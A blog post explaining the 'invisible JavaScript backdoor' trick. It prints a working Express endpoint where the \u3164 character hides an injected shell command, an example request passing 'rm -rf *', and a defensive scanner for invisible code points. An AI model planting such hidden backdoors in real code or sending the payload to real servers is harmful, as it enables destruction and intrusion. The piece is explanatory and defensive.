If the code of a software is open source, will it be safe if there are no backdoors?

888u

Last update: 2024-05-23, edited by 888u


Recently (over the past few years) friends in the group have discussed the security of scripts. Many people say something like: "My script is open source on GitHub and everyone can see the code. If there were a backdoor it would have been discovered long ago, so it must be safe."

Such remarks are obviously naive. Firstly, very few people actually read the source code; secondly, there are ways to hide a backdoor inside a perfectly harmless-looking piece of code, so that even if you do read the source it is hard to see where the problem is.

Today, while browsing (slacking off) online, we came across an article, The Invisible JavaScript Backdoor (css-tricks.com/the-invisible-javascript-backdoor), which describes a very clever technique that could be called hiding a backdoor in plain sight.

The original Node.js code looks like this:

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);
const app = express();
app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];
    try {
        await Promise.all(checkCommands.map(cmd =>
            cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});
app.listen(8080);


This code uses the Express framework to build an API endpoint. When you call http://127.0.0.1:8080/network_health, the server first pings Google and then uses curl to fetch http://example.com. If both succeed, your network is evidently fine and ok is returned. You can also pass the parameter timeout=xxx to limit how long the two checks may take; if they exceed it, the network is considered to have a problem.

The function could hardly be simpler. What could possibly be wrong with it? Suppose I put this code in front of you for review: could you say there is something wrong with it?

In fact, the code above does contain a backdoor that can execute arbitrary commands on the machine where this endpoint is deployed, including but not limited to downloading Trojans or running rm -rf *.

The problem lies in the two places that were circled in the original screenshot.

After the comma in each of these two places there appears to be a space. You assume it is a space, but it is not: it is an invisible character, \u3164. In JavaScript, almost any Unicode character that is not a keyword can be used in a variable name, and \u3164 is a Unicode character, so it can obviously be used as a variable name.

Let's look at the place in the code above where the commands are executed:

const checkCommands = [
    'ping -c 1 google.com',
    'curl -s http://example.com/',ㅤ
];
try {
    await Promise.all(checkCommands.map(cmd =>
        cmd && exec(cmd, { timeout: +timeout || 5_000 })));


Here, Node.js calls the system shell to execute the two commands in the checkCommands array. Now, if you write it like this:

const hide_command = 'rm -rf *'
const checkCommands = [
    'ping -c 1 google.com',
    'curl -s http://example.com/',ㅤhide_command
];


then you can clearly see that three commands are executed, and the third one deletes the files on the machine. Now replace the name hide_command with \u3164:

const ㅤ = 'rm -rf *'
const checkCommands = [
    'ping -c 1 google.com',
    'curl -s http://example.com/',ㅤ
];


Although you might find const ㅤ = 'rm -rf *' a little strange, you would not suspect anything wrong with the array that follows, because to your eyes the array contains only two commands when it actually contains three.

The attack code goes further and hides the strange assignment const ㅤ = 'rm -rf *' inside const { timeout,ㅤ} = req.query;. This works because in Express, URL query parameters can be read like this:

const {id, name, type} = req.query;


You can then supply these three parameters in the URL: http://127.0.0.1:8000/network_health?id=xxx&name=yyy&type=zzz. The backdoored code actually receives two parameters, timeout and ㅤ. The second one, which looks like a space, is \u3164, the variable name. Therefore you can request the URL http://127.0.0.1:8000/network_health?timeout=10&ㅤ=rm -rf * and pass in a command that deletes the system's files. Any shell command can be passed here. If you do not want to destroy the other party's system, you could have the shell download a Trojan onto their machine and then quietly monitor what they do every day.

A backdoor like this is genuinely hard to detect, and there is no good way to avoid being tricked. For example, suppose you see on GitHub that someone has open-sourced an e-commerce system based on Node.js, so you use it to build your own online shop to sell small items. One day you may find that your accounts do not add up, possibly because of a backdoor like this in the system.

All I can say is that the best approach is not to run code of unknown origin, and not to blindly assume that code is safe just because it is an open-source project.
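As an added example (not code from the original post or from the css-tricks article), here is a small scanner that walks JavaScript source by code point and flags the Hangul filler and zero-width characters the post describes; the code-point list is a short, non-exhaustive one chosen for this example, and the sample source is constructed to mirror the two spots in the post.

```javascript
// Added example: flag invisible Unicode code points that can hide in JavaScript
// identifiers. The list below is a constructed, partial set for this example.
const SUSPICIOUS = new Map([
  [0x3164, 'HANGUL FILLER'],              // the character used in the post
  [0xFFA0, 'HALFWIDTH HANGUL FILLER'],
  [0x115F, 'HANGUL CHOSEONG FILLER'],
  [0x1160, 'HANGUL JUNGSEONG FILLER'],
  [0x200B, 'ZERO WIDTH SPACE'],
  [0x200C, 'ZERO WIDTH NON-JOINER'],
  [0x200D, 'ZERO WIDTH JOINER'],
  [0x2060, 'WORD JOINER'],
  [0xFEFF, 'ZERO WIDTH NO-BREAK SPACE'],
  [0x202E, 'RIGHT-TO-LEFT OVERRIDE'],     // bidi control, also used to disguise source
]);

// Returns one finding per suspicious code point: 1-based line and column,
// the code point in U+XXXX form, its name, and the trimmed source line.
function findInvisibleCodePoints(source) {
  const findings = [];
  source.split('\n').forEach((lineText, i) => {
    let col = 1;
    for (const ch of lineText) {          // for..of iterates by code point, not UTF-16 unit
      const cp = ch.codePointAt(0);
      if (SUSPICIOUS.has(cp)) {
        findings.push({
          line: i + 1,
          col,
          codePoint: 'U+' + cp.toString(16).toUpperCase().padStart(4, '0'),
          name: SUSPICIOUS.get(cp),
          context: lineText.trim(),
        });
      }
      col += 1;
    }
  });
  return findings;
}

// Constructed sample: the two lines from the post where \u3164 hides after a comma.
const SAMPLE =
  'const { timeout,\u3164} = req.query;\n' +
  'const checkCommands = [\n' +
  "  'ping -c 1 google.com',\n" +
  "  'curl -s http://example.com/',\u3164\n" +
  '];\n';

function checkSample() {
  return findInvisibleCodePoints(SAMPLE);
}

for (const h of checkSample()) {
  console.log(`${h.line}:${h.col} ${h.codePoint} ${h.name} -- ${h.context}`);
}
```

Run against a real file with the source read in via fs.readFileSync; a hit on either line in the sample corresponds exactly to the hidden variable name and the hidden third array element in the post.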



All copyrights belong to 888u unless otherwise stated.